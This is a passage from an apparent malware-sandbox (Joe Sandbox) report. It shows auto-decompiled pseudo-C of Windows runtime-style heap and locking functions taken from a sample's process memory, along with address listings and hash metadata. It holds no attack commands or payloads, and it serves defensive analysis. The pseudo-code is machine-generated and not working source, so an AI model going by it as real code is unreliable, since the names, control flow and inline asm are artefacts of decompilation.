						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01082280( *[fs:0x30], 0x1158550);
						_t139 =  *0x1157b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0109F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0107FFB0(_t193, _t235, 0x1158550);
								L5:
								return E010BD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01061C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1157b9c; // 0x0
							_t235 = L01084620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1157b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0109A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0107FFB0(_t193, _t235, 0x1158550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L010877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L010877F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1157b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1157b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E010A37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1157b9c; // 0x0
									_t214 = L01084620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E010A37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1157b10 =  *0x1157b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1157b04 =  *0x1157b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L010877F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L010877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1157b08 =  *0x1157b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E010A57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E010AF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L010877F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0109A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L010877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E010A96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                            0x0107849b
                                                                                                            0x0107849b
                                                                                                            0x0107849b
                                                                                                            0x0107849b
                                                                                                            0x0107849d
                                                                                                            0x010784a2
                                                                                                            0x010784a7
                                                                                                            0x010784b1
                                                                                                            0x010784d8
                                                                                                            0x00000000
                                                                                                            0x010784b3
                                                                                                            0x010784c4
                                                                                                            0x010784c9
                                                                                                            0x010784cd
                                                                                                            0x010784cf
                                                                                                            0x010784cf
                                                                                                            0x010784d6
                                                                                                            0x010784e6
                                                                                                            0x010784e9
                                                                                                            0x010784ec
                                                                                                            0x010784ef
                                                                                                            0x010784f2
                                                                                                            0x010784f4
                                                                                                            0x010784fc
                                                                                                            0x01078501
                                                                                                            0x01078506
                                                                                                            0x01078509
                                                                                                            0x010786e0
                                                                                                            0x010786e5
                                                                                                            0x010786e8
                                                                                                            0x010786ed
                                                                                                            0x010786f0
                                                                                                            0x010786f2
                                                                                                            0x010c9afd
                                                                                                            0x010c9b02
                                                                                                            0x010784da
                                                                                                            0x010784df
                                                                                                            0x010784df
                                                                                                            0x010786fa
                                                                                                            0x010786fd
                                                                                                            0x010786fe
                                                                                                            0x01078701
                                                                                                            0x01078706
                                                                                                            0x01078709
                                                                                                            0x0107870b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01078711
                                                                                                            0x01078725
                                                                                                            0x01078727
                                                                                                            0x0107872a
                                                                                                            0x0107872c
                                                                                                            0x010c9af0
                                                                                                            0x010c9af5
                                                                                                            0x01078732
                                                                                                            0x01078732
                                                                                                            0x01078732
                                                                                                            0x01078735
                                                                                                            0x01078737
                                                                                                            0x01078515
                                                                                                            0x01078515
                                                                                                            0x01078518
                                                                                                            0x0107851d
                                                                                                            0x01078523
                                                                                                            0x01078527
                                                                                                            0x0107852b
                                                                                                            0x01078537
                                                                                                            0x01078539
                                                                                                            0x0107853c
                                                                                                            0x0107853e
                                                                                                            0x0107868c
                                                                                                            0x01078691
                                                                                                            0x01078699
                                                                                                            0x0107869b
                                                                                                            0x01078744
                                                                                                            0x01078748
                                                                                                            0x010786a1
                                                                                                            0x010786a1
                                                                                                            0x010786a1
                                                                                                            0x010786a4
                                                                                                            0x010786a8
                                                                                                            0x010c9bdf
                                                                                                            0x010c9bdf
                                                                                                            0x010786ae
                                                                                                            0x010786b0
                                                                                                            0x00000000
                                                                                                            0x010786b6
                                                                                                            0x00000000
                                                                                                            0x010c9be9
                                                                                                            0x010786b0
                                                                                                            0x01078544
                                                                                                            0x0107854a
                                                                                                            0x0107854d
                                                                                                            0x01078551
                                                                                                            0x0107876e
                                                                                                            0x01078778
                                                                                                            0x0107877b
                                                                                                            0x01078780
                                                                                                            0x01078557
                                                                                                            0x01078557
                                                                                                            0x0107855d
                                                                                                            0x0107855d
                                                                                                            0x0107856b
                                                                                                            0x0107856e
                                                                                                            0x01078570
                                                                                                            0x01078573
                                                                                                            0x01078576
                                                                                                            0x01078576
                                                                                                            0x01078579
                                                                                                            0x0107857b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01078581
                                                                                                            0x010785a0
                                                                                                            0x010785a2
                                                                                                            0x010785a5
                                                                                                            0x010785a7
                                                                                                            0x010c9b1b
                                                                                                            0x010c9b1b
                                                                                                            0x0107862e
                                                                                                            0x0107862e
                                                                                                            0x01078631
                                                                                                            0x01078631
                                                                                                            0x01078634
                                                                                                            0x01078636
                                                                                                            0x01078669
                                                                                                            0x01078669
                                                                                                            0x0107866b
                                                                                                            0x010c9bbf
                                                                                                            0x010c9bc4
                                                                                                            0x010c9bc8
                                                                                                            0x010c9bce
                                                                                                            0x010c9bce
                                                                                                            0x01078671
                                                                                                            0x01078671
                                                                                                            0x01078674
                                                                                                            0x01078676
                                                                                                            0x010c9bae
                                                                                                            0x010c9bae
                                                                                                            0x01078676
                                                                                                            0x0107867c
                                                                                                            0x0107867e
                                                                                                            0x01078688
                                                                                                            0x01078688
                                                                                                            0x00000000
                                                                                                            0x0107867e
                                                                                                            0x01078638
                                                                                                            0x01078638
                                                                                                            0x0107863b
                                                                                                            0x0107863e
                                                                                                            0x0107863f
                                                                                                            0x01078642
                                                                                                            0x01078645
                                                                                                            0x01078648
                                                                                                            0x0107864d
                                                                                                            0x010c9b69
                                                                                                            0x010c9b6e
                                                                                                            0x010c9b7b
                                                                                                            0x010c9b81
                                                                                                            0x010c9b85
                                                                                                            0x010c9b89
                                                                                                            0x010c9ba7
                                                                                                            0x010c9b8b
                                                                                                            0x010c9b91
                                                                                                            0x010c9b9a
                                                                                                            0x010c9b9f
                                                                                                            0x010c9b9f
                                                                                                            0x01078788
                                                                                                            0x0107878d
                                                                                                            0x01078763
                                                                                                            0x01078763
                                                                                                            0x01078766
                                                                                                            0x00000000
                                                                                                            0x01078766
                                                                                                            0x010c9b70
                                                                                                            0x00000000
                                                                                                            0x010c9b70
                                                                                                            0x01078656
                                                                                                            0x0107865a
                                                                                                            0x0107865c
                                                                                                            0x01078752
                                                                                                            0x01078756
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107875e
                                                                                                            0x00000000
                                                                                                            0x0107875e
                                                                                                            0x01078662
                                                                                                            0x01078662
                                                                                                            0x01078662
                                                                                                            0x01078666
                                                                                                            0x00000000
                                                                                                            0x01078666
                                                                                                            0x010785b7
                                                                                                            0x010785b9
                                                                                                            0x010785bc
                                                                                                            0x010785bf
                                                                                                            0x010785cc
                                                                                                            0x010785d1
                                                                                                            0x010785d4
                                                                                                            0x010785db
                                                                                                            0x010785de
                                                                                                            0x010785e0
                                                                                                            0x010c9b5f
                                                                                                            0x00000000
                                                                                                            0x010c9b5f
                                                                                                            0x010785e6
                                                                                                            0x010785ea
                                                                                                            0x010786c3
                                                                                                            0x010786c5
                                                                                                            0x010786c8
                                                                                                            0x010786ca
                                                                                                            0x010c9b16
                                                                                                            0x00000000
                                                                                                            0x010c9b16
                                                                                                            0x010786d6
                                                                                                            0x010785f6
                                                                                                            0x010785f6
                                                                                                            0x010785f9
                                                                                                            0x01078602
                                                                                                            0x01078606
                                                                                                            0x0107860a
                                                                                                            0x0107860b
                                                                                                            0x0107860e
                                                                                                            0x01078611
                                                                                                            0x00000000
                                                                                                            0x01078611
                                                                                                            0x010785f3
                                                                                                            0x00000000
                                                                                                            0x010785f3
                                                                                                            0x01078619
                                                                                                            0x0107861e
                                                                                                            0x0107861e
                                                                                                            0x01078621
                                                                                                            0x01078622
                                                                                                            0x01078623
                                                                                                            0x01078625
                                                                                                            0x0107862c
                                                                                                            0x00000000
                                                                                                            0x0107873d
                                                                                                            0x00000000
                                                                                                            0x0107873d
                                                                                                            0x01078737
                                                                                                            0x0107850f
                                                                                                            0x01078512
                                                                                                            0x00000000
                                                                                                            0x01078512
                                                                                                            0x00000000
                                                                                                            0x010784d6

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d638fec8bb41f0de494f8a2bc3784b09b36f566bbb8264dabad6a740af8967e8
                                                                                                            • Instruction ID: 2c153bcf937d2f0b26e03fc17724472096425abf3fdfb8ba1cee7f38b4b8d3bf
                                                                                                            • Opcode Fuzzy Hash: d638fec8bb41f0de494f8a2bc3784b09b36f566bbb8264dabad6a740af8967e8
                                                                                                            • Instruction Fuzzy Hash: CBB14D70E0020AEFDB19DFD9C988AADBBB5BF48704F10812EE595AB245DB70A941CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109513A Relevance: .3, Instructions: 258COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0109513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x115d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E010AD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01082280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01084620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E010AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0107FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x115b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E010AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                            0x01095142
                                                                                                            0x0109514c
                                                                                                            0x01095150
                                                                                                            0x01095157
                                                                                                            0x01095159
                                                                                                            0x0109515e
                                                                                                            0x01095165
                                                                                                            0x01095169
                                                                                                            0x0109516c
                                                                                                            0x01095172
                                                                                                            0x01095176
                                                                                                            0x0109517a
                                                                                                            0x0109517a
                                                                                                            0x0109517a
                                                                                                            0x0109517f
                                                                                                            0x010d6d8b
                                                                                                            0x010d6d8e
                                                                                                            0x010d6d91
                                                                                                            0x010d6d95
                                                                                                            0x010d6d98
                                                                                                            0x010d6d9c
                                                                                                            0x010d6da0
                                                                                                            0x010d6da3
                                                                                                            0x010d6da7
                                                                                                            0x010d6e26
                                                                                                            0x010d6e26
                                                                                                            0x010d6e2a
                                                                                                            0x010951f9
                                                                                                            0x010951f9
                                                                                                            0x010951fe
                                                                                                            0x010d6e33
                                                                                                            0x010d6e33
                                                                                                            0x010d6e39
                                                                                                            0x010d6e3d
                                                                                                            0x010d6e46
                                                                                                            0x010d6e50
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6e52
                                                                                                            0x010d6e53
                                                                                                            0x010d6e56
                                                                                                            0x010d6e5d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6e5f
                                                                                                            0x010d6e67
                                                                                                            0x010d6e77
                                                                                                            0x010d6e7f
                                                                                                            0x010d6e80
                                                                                                            0x010d6e88
                                                                                                            0x010d6e90
                                                                                                            0x010d6e9f
                                                                                                            0x010d6ea5
                                                                                                            0x010d6ea9
                                                                                                            0x010d6eb1
                                                                                                            0x010d6ebf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6ecf
                                                                                                            0x010d6ed3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6edb
                                                                                                            0x010d6ede
                                                                                                            0x010d6ee1
                                                                                                            0x010d6ee8
                                                                                                            0x010d6eeb
                                                                                                            0x010d6eed
                                                                                                            0x010d6ef0
                                                                                                            0x010d6ef4
                                                                                                            0x010d6ef8
                                                                                                            0x010d6efc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6f0d
                                                                                                            0x010d6f11
                                                                                                            0x010d6f32
                                                                                                            0x010d6f37
                                                                                                            0x010d6f3b
                                                                                                            0x010d6f3e
                                                                                                            0x010d6f41
                                                                                                            0x010d6f46
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6f4c
                                                                                                            0x010d6f50
                                                                                                            0x010d6f50
                                                                                                            0x010d6f54
                                                                                                            0x010d6f62
                                                                                                            0x010d6f65
                                                                                                            0x010d6f6d
                                                                                                            0x010d6f7b
                                                                                                            0x010d6f7b
                                                                                                            0x010d6f93
                                                                                                            0x010d6f98
                                                                                                            0x010d6fa0
                                                                                                            0x010d6fa6
                                                                                                            0x010d6fb3
                                                                                                            0x010d6fb6
                                                                                                            0x010d6fbf
                                                                                                            0x010d6fc1
                                                                                                            0x010d6fd5
                                                                                                            0x010d6fda
                                                                                                            0x010d6fda
                                                                                                            0x010d6fdd
                                                                                                            0x010d6fe2
                                                                                                            0x010d6fe7
                                                                                                            0x010d6feb
                                                                                                            0x010d6fef
                                                                                                            0x010d6ff3
                                                                                                            0x0109520c
                                                                                                            0x0109520c
                                                                                                            0x0109520f
                                                                                                            0x01095215
                                                                                                            0x01095234
                                                                                                            0x0109523a
                                                                                                            0x0109523a
                                                                                                            0x01095244
                                                                                                            0x01095245
                                                                                                            0x01095246
                                                                                                            0x01095251
                                                                                                            0x01095251
                                                                                                            0x010d6f13
                                                                                                            0x010d6f17
                                                                                                            0x010d6f17
                                                                                                            0x010d6f18
                                                                                                            0x010d6f1b
                                                                                                            0x010d6f1f
                                                                                                            0x010d6f23
                                                                                                            0x00000000
                                                                                                            0x010d6f28
                                                                                                            0x01095204
                                                                                                            0x01095204
                                                                                                            0x01095208
                                                                                                            0x00000000
                                                                                                            0x01095208
                                                                                                            0x01095185
                                                                                                            0x01095188
                                                                                                            0x0109518a
                                                                                                            0x0109518e
                                                                                                            0x01095195
                                                                                                            0x010d6db1
                                                                                                            0x010d6db5
                                                                                                            0x010d6db9
                                                                                                            0x0109519b
                                                                                                            0x0109519b
                                                                                                            0x0109519e
                                                                                                            0x010951a7
                                                                                                            0x010951a9
                                                                                                            0x010951a9
                                                                                                            0x010951b5
                                                                                                            0x010951b8
                                                                                                            0x010951bb
                                                                                                            0x010951be
                                                                                                            0x010951c1
                                                                                                            0x010951c5
                                                                                                            0x010951c9
                                                                                                            0x010951cd
                                                                                                            0x010951cd
                                                                                                            0x010951d8
                                                                                                            0x010951dc
                                                                                                            0x010951e0
                                                                                                            0x010d6dcc
                                                                                                            0x010d6dd0
                                                                                                            0x010d6dd5
                                                                                                            0x010d6ddd
                                                                                                            0x010d6de1
                                                                                                            0x010d6de1
                                                                                                            0x010d6de5
                                                                                                            0x010d6deb
                                                                                                            0x010d6df1
                                                                                                            0x010d6df7
                                                                                                            0x010d6dfd
                                                                                                            0x010d6e01
                                                                                                            0x010d6e05
                                                                                                            0x010d6e09
                                                                                                            0x010d6e0d
                                                                                                            0x010d6e11
                                                                                                            0x010d6e11
                                                                                                            0x010951eb
                                                                                                            0x010d6e1a
                                                                                                            0x010d6e1f
                                                                                                            0x010d6e21
                                                                                                            0x010d6e23
                                                                                                            0x00000000
                                                                                                            0x010951f1
                                                                                                            0x010951f1
                                                                                                            0x00000000
                                                                                                            0x010951f1

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f3590119f73b05ea6bf7beefada37ca0667c3b6efc28f33853b51a0f8037d79
                                                                                                            • Instruction ID: e4984ad7abdceece4cb55a775a89158135823e097fbb0af95f3bf574ee3aab09
                                                                                                            • Opcode Fuzzy Hash: 8f3590119f73b05ea6bf7beefada37ca0667c3b6efc28f33853b51a0f8037d79
                                                                                                            • Instruction Fuzzy Hash: 2FC121755083818FD755CF28C480A6AFBE1BF89304F184AAEF9D98B352D771E885CB42
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010903E2 Relevance: .3, Instructions: 254COMMON
